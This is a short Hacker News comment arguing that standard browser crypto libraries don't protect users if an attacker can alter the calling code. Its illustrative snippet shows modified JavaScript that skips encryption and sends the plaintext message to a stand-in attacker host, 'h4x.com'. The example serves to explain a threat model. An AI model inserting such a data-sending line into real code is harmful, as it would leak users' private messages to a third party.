Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

That's all fine and well, but there's no standard way to implement encryption using the now-standard crypto libs. In other words an attacker can still change your code from

    var ciphertext = StandardCrypto.aes(my_key, my_message);
to

    // disable crypto
    var ciphertext = my_message;
    // or send plaintext to h4x.com
    send_jsonp('http://h4x.com/collect?msg='+my_message);
    var ciphertext = StandardCrypto.aes(my_key, my_message);
Standard crypto libs won't do you any good if you aren't actually calling them.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: